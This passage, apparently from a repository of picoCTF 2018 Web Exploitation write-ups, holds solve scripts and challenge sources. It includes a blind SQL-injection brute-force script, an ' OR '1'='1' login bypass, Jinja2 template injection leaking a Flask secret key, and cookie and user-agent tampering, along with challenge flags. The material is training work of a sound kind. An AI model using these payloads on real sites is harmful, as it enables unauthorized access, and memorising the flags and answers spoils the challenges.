\";\n}\n```\n\nAlright, let's create a small injection to slowly brute-force the answer.\n`' UNION SELECT * FROM answers WHERE answer GLOB '*'; --`\n\nWe use _GLOB_ instead of _LIKE_ because it's case-sensitive. Also we use _*_ or _%_ because _GLOB_ uses Unix wildcards.\n\nWe run the script and get the flag.\n\n```python\nfinal = ''\nwhile True:\n\tfor i in range(0x20, 0x7f):\n\t\tif i != 42 and i != 63: # Removes Unix wildcards '*' and '?'\n\t\t\tparams = {\n\t\t\t\t'answer': \"' UNION SELECT * FROM answers WHERE answer GLOB '{}{}*'; --\".format(final, chr(i))\n\t\t\t}\n\t\t\tr = requests.post('http://2018shell1.picoctf.com:2644/answer2.php', data=params)\n\t\t\tres = r.text\n\t\t\tprint res\n```\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{qu3stions_ar3_h4rd_28fc1206}`\n" }, { "path": "Web Exploitation/A Simple Question/solution/solve.py", "content": "#!/usr/bin/python\nimport requests\nimport re\n\ndef brute():\n\tfinal = ''\n\twhile True:\n\t\tfor i in range(0x20, 0x7f):\n\t\t\tif i != 42 and i != 63: # Removes Unix wildcards '*' and '?'\n\t\t\t\tparams = {\n\t\t\t\t\t'answer': \"' UNION SELECT * FROM answers WHERE answer GLOB '{}{}*'; --\".format(final, chr(i))\n\t\t\t\t}\n\t\t\t\tr = requests.post('http://2018shell1.picoctf.com:2644/answer2.php', data=params)\n\t\t\t\tres = r.text\n\t\t\t\tprint res\n\n\t\t\tif 'You are so close.' in res:\n\t\t\t\tfinal += chr(i)\n\t\t\t\tprint final\n\t\t\t\tbreak\n\t\t\telif i == 0x7e:\n\t\t\t\treturn final # 41AndSixSixths\n\nans = brute()\nflag = requests.post('http://2018shell1.picoctf.com:2644/answer2.php', data={'answer': ans}).text\nprint 'Flag: ' + re.findall(r'(picoCTF\\{.+\\})', flag)[0]\n" }, { "path": "Web Exploitation/A Simple Question/solution/source/answer2.phps", "content": "\";\n echo \"SQL query: \", htmlspecialchars($query), \"\\n\";\n echo \"\";\n?>\nquery($query);\n\n $row = $result->fetchArray();\n if($answer == $CANARY) {\n echo \"

Perfect!

\";\n echo \"

Your flag is: $FLAG

\";\n }\n elseif ($row) {\n echo \"

You are so close.

\";\n } else {\n echo \"

Wrong.

\";\n }\n?>\n" }, { "path": "Web Exploitation/A Simple Question/solution/source/index.html", "content": "\n\n\n Question\n \n\n\n
\n
\n
\n
\n
\n

A Simple Question

\n
\n
\n
\n What is the answer?\n
\n
\n\n
\n
\n
\n \n
\n
\n\n \n\n
\n \n
\n
\n
\n
\n
\n
\n
\n
\n\n\n" }, { "path": "Web Exploitation/Artisinal Handcrafted HTTP 3/README.md", "content": "# Artisinal Handcrafted HTTP 3\nPoints: 300\n\n## Category\nWeb Exploitation\n\n## Question\n>We found a hidden flag server hiding behind a proxy, but the proxy has some... _interesting_ ideas of what qualifies someone to make HTTP requests. Looks like you'll have to do this one by hand. Try connecting via `nc 2018shell1.picoctf.com 42496`, and use the proxy to send HTTP requests to `flag.local`. We've also recovered a username and a password for you to use on the login page: `realbusinessuser`/`potoooooooo`. \n\n### Hint\n>_Be the browser._ When you navigate to a page, how does your browser send HTTP requests? How does this change when you submit a form?\n\n## Solution\nDoing an initial GET request for _/_, we can see a link to _/login_\n\n```html\nGET / HTTP/1.1\nHost: flag.local\n\nHTTP/1.1 200 OK\nx-powered-by: Express\ncontent-type: text/html; charset=utf-8\ncontent-length: 321\netag: W/\"141-LuTf9ny9p1l454tuA3Un+gDFLWo\"\ndate: Sun, 30 Sep 2018 14:26:00 GMT\nconnection: close\n\n\n\n\n\n\t\n\n\n\n\t
\n\t\t

Real Business Internal Flag Server

\n\t\tLogin\n\t
\n\t
\n\t\t

You need to log in before you can see today's flag.

\n\t
\n\n\n\n```\n\nWhen we do another GET request for _/login_, we can see the paramters of required. We can use the username and password provided in the question.\n\n```html\nGET /login HTTP/1.1\nHost: flag.local\n\nHTTP/1.1 200 OK\nx-powered-by: Express\ncontent-type: text/html; charset=utf-8\ncontent-length: 498\netag: W/\"1f2-UE5AGAqbLVQn1qrfKFRIqanxl9I\"\ndate: Sun, 30 Sep 2018 14:35:39 GMT\nconnection: close\n\n\n\n\n\n\t\n\n\n\n\t
\n\t\t

Real Business Internal Flag Server

\n\t\tLogin\n\t
\n\t
\n\t\t

Log In

\n\n\t\t
\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t
\n\t
\n\n\n\n```\n\nWhen we send a POST request to _/login_ with the username and password, a cookie is set.\n\n```html\nPOST /login HTTP/1.1\nHost: flag.local\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 38\nConnection: keep-alive\nUpgrade-Insecure-Requests: 1\n\nuser=realbusinessuser&pass=potoooooooo\nHTTP/1.1 302 Found\nx-powered-by: Express\nset-cookie: real_business_token=PHNjcmlwdD5hbGVydCgid2F0Iik8L3NjcmlwdD4%3D; Path=/\nlocation: /\nvary: Accept\ncontent-type: text/html; charset=utf-8\ncontent-length: 46\ndate: Sun, 30 Sep 2018 14:37:38 GMT\nconnection: keep-alive\n\n

Found. Redirecting to /

\n```\n\nAll we have to do now is input in the cookie for _/_ and get the flag.\n\n```html\nGET / HTTP/1.1\nHost: flag.local\nCookie: real_business_token=PHNjcmlwdD5hbGVydCgid2F0Iik8L3NjcmlwdD4%3D;\n\nHTTP/1.1 200 OK\nx-powered-by: Express\ncontent-type: text/html; charset=utf-8\ncontent-length: 438\netag: W/\"1b6-eYJ8DUTdkgByyfWFi6OJJSjopFg\"\ndate: Sun, 30 Sep 2018 14:38:54 GMT\nconnection: close\n\n\n\n\t\n\t\t\n\t\n\t\n\t\t
\n\t\t\t

Real Business Internal Flag Server

\n\t\t\t
Real Business Employee
\n\t\t\tLogout\n\t\t
\n\t\t
\n\t\t\t

Hello Real Business Employee! Today's flag is: picoCTF{0nLY_Us3_n0N_GmO_xF3r_pR0tOcol5_2e14}.

\n\t\t
\n\t\n\n```\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{0nLY_Us3_n0N_GmO_xF3r_pR0tOcol5_2e14}`\n" }, { "path": "Web Exploitation/Artisinal Handcrafted HTTP 3/solution/solve.py", "content": "#!/usr/bin/python\n\nfrom pwn import *\nimport time\nimport re\n\ns = remote('2018shell1.picoctf.com', 42496)\n\ntime.sleep(1)\nprint s.recv(),\ncaptcha = raw_input('')\n\ns.sendline(captcha)\ntime.sleep(1)\n\nfail = s.recv().strip()\n\nif 'succeeded' in fail:\n\tprint \n\treq = '''GET / HTTP/1.1\nHost: flag.local\nCookie: real_business_token=PHNjcmlwdD5hbGVydCgid2F0Iik8L3NjcmlwdD4%3D;\n'''\n\n\tprint req\n\ts.sendline(req)\n\ttime.sleep(1)\n\tsource = s.recv()\n\n\tprint re.findall(r'(picoCTF\\{.+\\})', source)[0]\nelse:\n\tlog.info('Wrong validation!')\n\ns.close()\n" }, { "path": "Web Exploitation/Buttons/README.md", "content": "# Buttons\nPoints: 250\n\n## Category\nWeb Exploitation\n\n## Question\n>There is a website running at http://2018shell1.picoctf.com:21579 ([link](http://2018shell1.picoctf.com:21579/)). Try to see if you can push their buttons. \n\n### Hint\n>What's different about the two buttons?\n\n## Solution\nFollow the buttons and get Rick Roll'd!\n\nIn _boo.html_, looking at the source, we can see that _button2.php_ is expecting a POST request. As such, all we have to do is send a POST request and get the flag.\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{button_button_whose_got_the_button_ed306c10}`\n" }, { "path": "Web Exploitation/Buttons/solution/solve.py", "content": "#!/usr/bin/python\n\nimport requests\nimport re\n\nr = requests.post('http://2018shell1.picoctf.com:21579/button2.php')\nsource = r.text\n\nprint re.findall(r'(picoCTF\\{.+\\})', source)[0]\n" }, { "path": "Web Exploitation/Buttons/solution/source/boo.html", "content": "\n\n\n Buttons!\n \n\n\n
\n
\n
\n
\n
\n

Button2: ACCESS DENIED

\n
\n
\n
\n FORM DISABLED. THIS INCIDENT HAS BEEN LOGGED AND REPORTED TO /dev/null \n
\n
\n
\n
\n
\n
\n\n\n" }, { "path": "Web Exploitation/Buttons/solution/source/button1.php", "content": "\n\n\n Buttons!\n \n\n\n
\n You did it! Try the next button: Button2\n
\n\n" }, { "path": "Web Exploitation/Buttons/solution/source/index.html", "content": "\n\n\n Buttons!\n \n\n\n
\n
\n
\n
\n
\n

BUTTON1

\n
\n
\n
\n \n
\n
\n
\n
\n
\n
\n\n\n" }, { "path": "Web Exploitation/Client Side is Still Bad/README.md", "content": "# Client Side is Still Bad\nPoints: 150\n\n## Category\nWeb Exploitation\n\n## Question\n>I forgot my password again, but this time there doesn't seem to be a reset, can you help me? ([link](http://2018shell1.picoctf.com:55790/))\n\n### Hint\n>Client Side really is a bad way to do it.\n\n## Solution\nInspect element and piece the flag together\n\n```js\nfunction verify() {\n\tcheckpass = document.getElementById(\"pass\").value;\n\tsplit = 4;\n\tif (checkpass.substring(split * 7, split * 8) == '}') {\n\t\tif (checkpass.substring(split * 6, split * 7) == 'd366') {\n\t\t\tif (checkpass.substring(split * 5, split * 6) == 'd_3b') {\n\t\t\t\tif (checkpass.substring(split * 4, split * 5) == 's_ba') {\n\t\t\t\t\tif (checkpass.substring(split * 3, split * 4) == 'nt_i') {\n\t\t\t\t\t\tif (checkpass.substring(split * 2, split * 3) == 'clie') {\n\t\t\t\t\t\t\tif (checkpass.substring(split, split * 2) == 'CTF{') {\n\t\t\t\t\t\t\t\tif (checkpass.substring(0, split) == 'pico') {\n\t\t\t\t\t\t\t\t\talert(\"You got the flag!\")\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t} else {\n\t\talert(\"Incorrect password\");\n\t}\n}\n ```\n\n### Flag\n`picoCTF{client_is_bad_3bd366}`\n" }, { "path": "Web Exploitation/Client Side is Still Bad/solution/source/index.html", "content": "\n\nSuper Secure Log In\n\n\n\n\n\n\n
\n
\n

Welcome to the Secure Login Server.

\n

Please enter your credentials to proceed

\n
\n\n
\n\n
\n
\n
\n\n\n" }, { "path": "Web Exploitation/Flaskcards/README.md", "content": "# Flaskcards\nPoints: 350\n\n## Category\nWeb Exploitation\n\n## Question\n>We found this fishy [website](http://2018shell1.picoctf.com:23547/) for flashcards that we think may be sending secrets. Could you take a look? \n\n### Hint\n>Are there any common vulnerabilities with the backend of the website?\n>\n>Is there anywhere that filtering doesn't get applied?\n>\n>The database gets reverted every 2 hours so your session might end unexpectedly. Just make another user\n\n## Solution\nJudging by the name of the challenge, we can assume that the web application was written using the _Flask_ framework. We can assume that it is running the _Jinja2_ template engine.\n\nUpon registering and signing in, we get multiple options. Some which includes Creating and Listing cards.\n\nWe can do a sample injection by doing _{{1+1}}_. Both the _Question_ and the _Answer_ fields are vulnerable, so it doesn't matter where it's placed in.\n\nWe see that when we list the cards, it shows _2_ and not _{{1+1}}_. This means there's an injection.\n\nSince there's no source code anywhere to be found, we can just look around, printing out important information used by flask.\n\nBy submitting _{{config.items()}}_, we get a bunch of information about the server, as well as the _'SECRET_KEY'_, which contains the flag.\n\n```python\ndict_items([('DEBUG', False), ('PREFERRED_URL_SCHEME', 'http'), ('SQLALCHEMY_POOL_TIMEOUT', None), ('JSON_AS_ASCII', True),\n('PROPAGATE_EXCEPTIONS', None), ('ENV', 'production'), ('SQLALCHEMY_POOL_RECYCLE', None), ('PERMANENT_SESSION_LIFETIME', datetime.timedelta(31)),\n('JSON_SORT_KEYS', True), ('SQLALCHEMY_TRACK_MODIFICATIONS', False), ('SERVER_NAME', None), ('TRAP_BAD_REQUEST_ERRORS', None),\n('MAX_COOKIE_SIZE', 4093), ('USE_X_SENDFILE', False), ('EXPLAIN_TEMPLATE_LOADING', False), ('BOOTSTRAP_LOCAL_SUBDOMAIN', None),\n('APPLICATION_ROOT', '/'), ('BOOTSTRAP_USE_MINIFIED', True), ('MAX_CONTENT_LENGTH', None), ('BOOTSTRAP_QUERYSTRING_REVVING', True),\n('TRAP_HTTP_EXCEPTIONS', False), ('SESSION_COOKIE_PATH', None), ('TESTING', False), ('SQLALCHEMY_COMMIT_ON_TEARDOWN', False),\n('PRESERVE_CONTEXT_ON_EXCEPTION', None), ('SQLALCHEMY_POOL_SIZE', None), ('SESSION_COOKIE_HTTPONLY', True), ('SESSION_COOKIE_NAME', 'session'),\n('SESSION_COOKIE_SECURE', False), ('JSONIFY_PRETTYPRINT_REGULAR', False), ('TEMPLATES_AUTO_RELOAD', None), ('SESSION_COOKIE_SAMESITE', None),\n('JSONIFY_MIMETYPE', 'application/json'), ('SQLALCHEMY_RECORD_QUERIES', None), ('SESSION_COOKIE_DOMAIN', False), ('SEND_FILE_MAX_AGE_DEFAULT', datetime.timedelta(0, 43200)),\n('SQLALCHEMY_NATIVE_UNICODE', None), ('SQLALCHEMY_BINDS', None), ('SQLALCHEMY_DATABASE_URI', 'sqlite://'), ('SQLALCHEMY_ECHO', False),\n('BOOTSTRAP_SERVE_LOCAL', False), ('BOOTSTRAP_CDN_FORCE_SSL', False),\n('SECRET_KEY', 'picoCTF{secret_keys_to_the_kingdom_584f8327}'),\n('SESSION_REFRESH_EACH_REQUEST', True), ('SQLALCHEMY_MAX_OVERFLOW', None)])\n```\n\nI still have no idea what the admin page does.\n\n### Flag\n`picoCTF{secret_keys_to_the_kingdom_584f8327}`\n" }, { "path": "Web Exploitation/Flaskcards Skeleton Key/README.md", "content": "# Flaskcards Skeleton Key\nPoints: 600\n\n## Category\nWeb Exploitation\n\n## Question\n>Nice! You found out they were sending the Secret_key: 385c16dd09098b011d0086f9e218a0a2. Now, can you find a way to log in as admin? http://2018shell1.picoctf.com:48263 ([link](http://2018shell1.picoctf.com:48263/)). \n\n### Hint\n>What can you do with a flask Secret_Key?\n>\n>The database still reverts every 2 hours\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n" }, { "path": "Web Exploitation/Help Me Reset 2/README.md", "content": "# Help Me Reset 2\nPoints: 600\n\n## Category\nWeb Exploitation\n\n## Question\n>There is a website running at http://2018shell1.picoctf.com:19054 (link). We need to get into any user for a flag!\n\n### Hint\n>Try looking past the typical vulnerabilities. Think about possible programming mistakes.\n\n## Solution\ngoing to the site, upon inspection, we notice a comment stating\n```\n\n```\nassuming that the user has an account, we can then attempt to rest the password. we will be asked a few questions, to find the answer, i just did a simple google search for the popular answers\n\n```\nWhat is your favourite car make\nWhat is your favourite food?\nWhat is your favourite color? white\nWhat is your favourite superhero? thor\n```\n\nusing that, we can gain access and change the password and proceed to login\n\n### Flag\n`picoCTF{i_thought_i_could_remember_those_cb4afc2a}`\n" }, { "path": "Web Exploitation/Inspect Me/README.md", "content": "# Inspect Me\nPoints: 125\n\n## Category\nWeb Exploitation\n\n## Question\n>Inpect this code! http://2018shell1.picoctf.com:53213 ([link](http://2018shell1.picoctf.com:53213/)) \n\n### Hint\n>How do you inspect a website's code on a browser?\n>\n>Check all the website code.\n\n## Solution\nDo `wget -r http://2018shell1.picoctf.com:53213` to pull the html, css and js sources.\n\nGo into each individual source and locate the 3 pieces of the flag.\n\n### Flag\n`picoCTF{ur_4_real_1nspect0r_g4dget_402b0bd3}`\n" }, { "path": "Web Exploitation/Inspect Me/solution/source/index.html", "content": "\n\n \n My First Website :)\n \n \n \n \n\n \n
\n
\n\t

My First Website

\n
\n\n \n \n \n
\n\t

Intro

\n\t

This is my first website!

\n
\n\n
\n\t

About

\n\t

These are the web skills I've been practicing:
\n\t HTML
\n\t CSS
\n\t JS (JavaScript)\n\t

\n\t\n
\n \n
\n \n \n\n" }, { "path": "Web Exploitation/Inspect Me/solution/source/mycss.css", "content": "div.container {\n width: 100%;\n}\n\nheader {\n background-color: #c9d8ef;\n padding: 1em;\n color: white;\n clear: left;\n text-align: center;\n}\n\nbody {\n font-family: Roboto;\n}\n\nh1 {\n color: #222;\n}\n\np {\n font-family: \"Open Sans\";\n}\n\n.tablink {\n background-color: #555;\n color: white;\n float: left;\n border: none;\n outline: none;\n cursor: pointer;\n padding: 14px 16px;\n font-size: 17px;\n width: 50%;\n}\n\n.tablink:hover {\n background-color: #777;\n}\n\n.tabcontent {\n color: #111;\n display: none;\n padding: 50px;\n text-align: center;\n}\n\n#tabintro { background-color: #ccc; }\n#tababout { background-color: #ccc; }\n\n/* I learned CSS! Here's part 2/3 of the flag: ct0r_g4dget_402b0bd3} */" }, { "path": "Web Exploitation/Inspect Me/solution/source/myjs.js", "content": "function openTab(tabName,elmnt,color) {\n var i, tabcontent, tablinks;\n tabcontent = document.getElementsByClassName(\"tabcontent\");\n for (i = 0; i < tabcontent.length; i++) {\n\ttabcontent[i].style.display = \"none\";\n }\n tablinks = document.getElementsByClassName(\"tablink\");\n for (i = 0; i < tablinks.length; i++) {\n\ttablinks[i].style.backgroundColor = \"\";\n }\n document.getElementById(tabName).style.display = \"block\";\n if(elmnt.style != null) {\n\telmnt.style.backgroundColor = color;\n }\n}\n\nwindow.onload = function() {\n openTab('tabintro', this, '#222');\n}\n\n/* I learned JavaScript! Here's part 3/3 of the flag: */\n" }, { "path": "Web Exploitation/Irish Name Repo/README.md", "content": "# Irish Name Repo\nPoints: 200\n\n## Category\nWeb Exploitation\n\n## Question\n>There is a website running at http://2018shell1.picoctf.com:59464 ([link](http://2018shell1.picoctf.com:59464/)) . Do you think you can log us in? Try to see if you can login!\n\n### Hint\n>There doesn't seem to be many ways to interact with this, I wonder if the users are kept in a database?\n\n## Solution\nlooking at the support section of the site, it can be seen that the site uses SQL to store data,this could mean that it is vulnerable to SQL injections\n\n```\nCannot add name\nHi. I tried adding my favorite Irish person, Conan O'Brien. But I keep getting something called a SQL Error\nThat's because Conan O'Brien is American.\nAdmin\n```\n\ngoing to the login section of the site, it is seen that it accepts a username and password\n\n```\nLog In\n\nUsername: \nPassword:\n```\n\nUsing the username `' OR '1'='1' --`, we get the flag.\n\n```\nLogged in!\nYour flag is: picoCTF{con4n_r3411y_1snt_1r1sh_d121ca0b}\n```\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{con4n_r3411y_1snt_1r1sh_d121ca0b}`\n" }, { "path": "Web Exploitation/Irish Name Repo/solution/solve.py", "content": "#!/usr/bin/python\n\nimport requests\nimport re\n\nparams = {'username': \"' OR '1'='1' --\", 'password': '', 'debug': 0}\n\nr = requests.post('http://2018shell1.picoctf.com:59464/login.php', data=params)\nsource = r.text\nprint re.findall(r'(picoCTF\\{.+\\})', source)[0]\n" }, { "path": "Web Exploitation/Irish Name Repo/solution/source/index.html", "content": "\n\nW3.CSS Template\n\n\n\n\n\n\n\n\n
\n
\n
\n
List 'o the Irish!
\n
\n
\n\n\n\n\n\n
\n\n \n
\n
\n \"Image\n

Aidan Gillen

\n

I was on Game of Thrones!

\n
\n
\n \"Image\n

Aiden Higgens

\n

\"All fiction happened\"

\n
\n
\n \"Image\n

Alison Doody

\n

hehe...Doody.

\n
\n
\n \n
\n
\n \"Image\n

Dylan Moran

\n

\"You can sort your life out anytime; the pub closes in five hours.\"

\n
\n
\n \"Image\n

Tommy Tiernan

\n

Editor's note: could not find quote without profanity.

\n
\n
\n \"Image\n

Brendan Gleeson

\n

Guess which Harry Potter character I was!

\n
\n
\n \n\n \n
\n
\n «\n 1\n 2\n 3\n 4\n »\n
\n
\n\n\n
\n\n\n" }, { "path": "Web Exploitation/Irish Name Repo/solution/source/login.html", "content": "\n\n\n Login\n \n\n\n
\n
\n
\n
\n
\n

Log In

\n
\n
\n
\n
\n
\n \n \n
\n
\n \n
\n \n
\n
\n \n\n
\n \n
\n
\n
\n
\n
\n
\n
\n
\n\n\n" }, { "path": "Web Exploitation/Irish Name Repo/solution/source/support.html", "content": "\n\n\n Support\n \n\n\n
\n

Support

\n
\n
\n

Cannot add name

\n
\n
Hi. I tried adding my favorite Irish person, Conan O'Brien. But I keep getting something called a SQL Error
\n
\n
\n
That's because Conan O'Brien is American.
\n
Admin
\n
\n
\n
\n

Why is this site so trash?

\n
\n
Can you help me find my parents. I think they were Irish.
\n
Anna
\n
\n
\n
no
\n
Admin
\n
\n
\n \n
\n

Why is this site so trash?

\n
\n
Yo. Why this site look so bad? LOL
\n
JimmyMcTrollface
\n
\n
\n
I AM JUST ONE MAN!!!!
\n
Admin
\n
\n
\n\n\n" }, { "path": "Web Exploitation/LambDash 3/README.md", "content": "# LambDash 3\nPoints: 800\n\n## Category\nWeb Exploitation\n\n## Question\n>C? Who uses that anymore. If we really want to be secure, we should all start learning lambda calculus. http://2018shell1.picoctf.com:52603 ([link](http://2018shell1.picoctf.com:52603/)) \n\n### Hint\n>This compiler is 99.9% bug free! I'm sure the other 0.1% won't amount to anything...\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n" }, { "path": "Web Exploitation/Logon/README.md", "content": "# Logon\nPoints: 150\n\n## Category\nWeb Exploitation\n\n## Question\n>I made a website so now you can log on to! I don't seem to have the admin password. See if you can't get to the flag. ([link](http://2018shell1.picoctf.com:37861/)) \n\n### Hint\n>Hmm it doesn't seem to check anyone's password, except for admins?\n>\n>How does check the admin's password?\n\n## Solution\nUsing any password and username, you will be able to login, however, upon logon,you will be greeted by:\n\n```\nSuccess: You logged in! Not sure you'll be able to see the flag though.\nNo flag for you\n```\nUpon inspection of cookies, it can be seen that there exists a cookie names admin with theh value false\n```\nadmins\t\tFalse\t\t\t2018shell1.picoctf.com\t/\t1969-12-31T23:59:59.000Z\t10\npassword\tpassword\t\t2018shell1.picoctf.com\t/\t1969-12-31T23:59:59.000Z\t20\nusername\tusername\t\t2018shell1.picoctf.com\t/\t1969-12-31T23:59:59.000Z\t20\n```\n\nChanging the value of admin to True will result in the printing of the flag.\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{l0g1ns_ar3nt_r34l_a280e12c}`\n" }, { "path": "Web Exploitation/Logon/solution/solve.py", "content": "#!/usr/bin/python\n\nimport requests\nimport re\n\nparams = {'user': 'A', 'password': 'A', 'submit': 'Sign In'}\njar = {'admin': 'True', 'password': '', 'username': ''}\n\nr = requests.get('http://2018shell1.picoctf.com:37861/flag', data=params, cookies=jar)\nsource = r.text\nprint re.findall(r'(picoCTF\\{.+\\})', source)[0]\n" }, { "path": "Web Exploitation/Logon/solution/source/index.html", "content": "\n\n\n\n My New Website\n\n\n \n\n \n\n \n\n \n\n\n\n\n\n\n
\n
\n \n

My New Website

\n
\n \n \n \n \n
\n

\n
\n
\n
\n \n
\n
\n \n
\n
\n
\n
\n \n
\n
\n \n
\n
\n

© PicoCTF 2018

\n
\n\n
\n\n\n\n\n" }, { "path": "Web Exploitation/Logon/solution/source/logout", "content": "\n\n\n\n My New Website\n\n\n \n\n \n\n \n\n \n\n\n\n\n\n\n
\n
\n \n

My New Website

\n
\n \n \n \n \n
\n

\n
\n
\n
\n \n
\n
\n \n
\n
\n
\n
\n \n
\n
\n \n
\n
\n

© PicoCTF 2018

\n
\n\n
\n\n\n\n\n" }, { "path": "Web Exploitation/Mr. Robots/README.md", "content": "# Mr. Robots\nPoints: 200\n\n## Category\nWeb Exploitation\n\n## Question\n>Do you see the same things I see? The glimpses of the flag hidden away? ([link](http://2018shell1.picoctf.com:10157/))\n\n### Hint\n>What part of the website could tell you where the creator doesn't want you to look?\n\n## Solution\ngoing to the site, we will be able to see \n\n#### index.html\n```\nMr. Robots\nHELLO FRIEND\n```\ngiven the hints above, we visit /robots.txt to see if there any sites that the creator does not want us to know about\n\n#### robots.txt\n\n```\nUser-agent: *\nDisallow: /143ce.html\n```\nnow we go to 143ce.html\n\n#### 143ce.html\n```\nMr. Robots\nSo much depends upon a red flag\npicoCTF{th3_w0rld_1s_4_danger0us_pl4c3_3lli0t_143ce}\n```\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{th3_w0rld_1s_4_danger0us_pl4c3_3lli0t_143ce}`\n" }, { "path": "Web Exploitation/Mr. Robots/solution/solve.py", "content": "#!/usr/bin/python\n\nimport requests\nimport re\n\nr = requests.get('http://2018shell1.picoctf.com:10157/robots.txt')\nsource = r.text\npage = re.findall(r'Disallow: /(.+)', source)[0]\nprint 'Found: ' + page\n\nr = requests.get('http://2018shell1.picoctf.com:10157/{}'.format(page))\nsource = r.text\nprint re.findall(r'(picoCTF\\{.+\\})', source)[0]\n" }, { "path": "Web Exploitation/Mr. Robots/solution/source/index.html", "content": "\n\n \n Mr. Robots\n \n \n \n\n \n
\n
\n\t

Mr. Robots

\n
\n
\n\t

HELLO FRIEND

\n
\n
\n
\n \n\n" }, { "path": "Web Exploitation/Mr. Robots/solution/source/robots.txt", "content": "User-agent: *\nDisallow: /143ce.html\n" }, { "path": "Web Exploitation/Mr. Robots/solution/source/style.css", "content": "body {\n background-color: #1e2d3a;\n}\n\ndiv.container {\n width: 100%;\n height: 100%;\n postition: relative;\n}\n\nheader {\n background-color: #1e2d3a;\n padding: 1em;\n color: #d62a08;\n clear: left;\n text-align: center;\n font-family: Monoton;\n height: 80%;\n}\n\nfooter {\n position: absolute;\n //padding: 1em;\n color: white;\n background-color: #192733;\n clear: left;\n text-align: center;\n bottom: 0;\n width: 99%;\n height: 20px;\n}\n\ndiv.content {\n background-color: #223342;\n padding: 1em;\n color: white;\n clear: left;\n text-align: center;\n font-family: Roboto;\n //height: 550px;\n height: 60%;\n}\n\nflag {\n color: red;\n}" }, { "path": "Web Exploitation/No Login/README.md", "content": "# No Login\nPoints: 200\n\n## Category\nWeb Exploitation\n\n## Question\n>Looks like someone started making a website but never got around to making a login, but I heard there was a flag if you were the admin. http://2018shell1.picoctf.com:33889 ([link](http://2018shell1.picoctf.com:33889/)) \n\n### Hint\n>What is it actually looking for in the cookie?\n\n## Solution\nSet the cookie name _admin_ and value _true_.\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{n0l0g0n_n0_pr0bl3m_26b0181a}`\n" }, { "path": "Web Exploitation/No Login/solution/solve.py", "content": "#!/usr/bin/python\n\nimport requests\nimport re\n\njar = {'admin': 'True'}\nr = requests.get('http://2018shell1.picoctf.com:33889/flag', cookies=jar)\nsource = r.text\n\nprint re.findall(r'(picoCTF\\{.+\\})', source)[0]\n" }, { "path": "Web Exploitation/No Login/solution/source/flag", "content": "\n\n\n\n My New Website\n\n \n\n \n\n \n\n \n\n\n\n\n\n
\n
\n \n

My New Website

\n
\n \n \n \n \n
\n \n I'm sorry it doesn't look like you are the admin.\n
\n \n \n \n
\n

\n

Flag

\n
\n\n\n
\n

© PicoCTF 2018

\n
\n\n
\n\n\n" }, { "path": "Web Exploitation/No Login/solution/source/index.html", "content": "\n\n\n\n My New Website\n\n \n\n \n\n \n\n \n\n\n\n\n\n
\n
\n \n

My New Website

\n
\n \n \n \n \n
\n

\n

Flag

\n
\n\n\n
\n

© PicoCTF 2018

\n
\n\n
\n\n\n" }, { "path": "Web Exploitation/No Login/solution/source/unimplemented", "content": "\n\n\n\n My New Website\n\n \n\n \n\n \n\n \n\n\n\n\n\n
\n
\n \n

My New Website

\n
\n \n \n \n \n
\n \n This isn't implemented yet.\n
\n \n \n \n
\n

\n

Flag

\n
\n\n\n
\n

© PicoCTF 2018

\n
\n\n
\n\n\n" }, { "path": "Web Exploitation/Secret Agent/README.md", "content": "# Secret Agent\nPoints: 200\n\n## Category\nWeb Exploitation\n\n## Question\n>Here's a little website that hasn't fully been finished. But I heard google gets all your info anyway. http://2018shell1.picoctf.com:53383 ([link](http://2018shell1.picoctf.com:53383/)) \n\n### Hint\n>How can your browser pretend to be something else?\n\n## Solution\nSet the user agent to one that Google uses. For example: _Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)_\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{s3cr3t_ag3nt_m4n_134ecd62}`\n" }, { "path": "Web Exploitation/Secret Agent/solution/solve.py", "content": "#!/usr/bin/python\n\nimport requests\nimport re\n\nheaders = {\n\t'User-Agent': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'\n}\n\nr = requests.get('http://2018shell1.picoctf.com:53383/flag', headers=headers)\nsource = r.text\n\nprint re.findall(r'(picoCTF\\{.+\\})', source)[0]\n" }, { "path": "Web Exploitation/Secret Agent/solution/source/flag", "content": "\n\n\n\n My New Website\n\n \n\n \n\n \n\n \n\n\n\n\n\n
\n
\n \n

My New Website

\n
\n \n \n \n \n
\n \n You're not google!\nWget/1.19.5 (linux-gnu)\n
\n \n \n \n
\n

\n

Flag

\n
\n\n\n
\n

© PicoCTF 2018

\n
\n\n
\n \n\n\n" }, { "path": "Web Exploitation/Secret Agent/solution/source/index.html", "content": "\n\n\n\n My New Website\n\n \n\n \n\n \n\n \n\n\n\n\n\n
\n
\n \n

My New Website

\n
\n \n \n \n \n
\n

\n

Flag

\n
\n\n\n
\n

© PicoCTF 2018

\n
\n\n
\n \n\n\n" }, { "path": "Web Exploitation/Secret Agent/solution/source/unimplemented", "content": "\n\n\n\n My New Website\n\n \n\n \n\n \n\n \n\n\n\n\n\n
\n
\n \n

My New Website

\n
\n \n \n \n \n
\n \n This isn't implemented yet.\n
\n \n \n \n
\n

\n

Flag

\n
\n\n\n
\n

© PicoCTF 2018

\n
\n\n
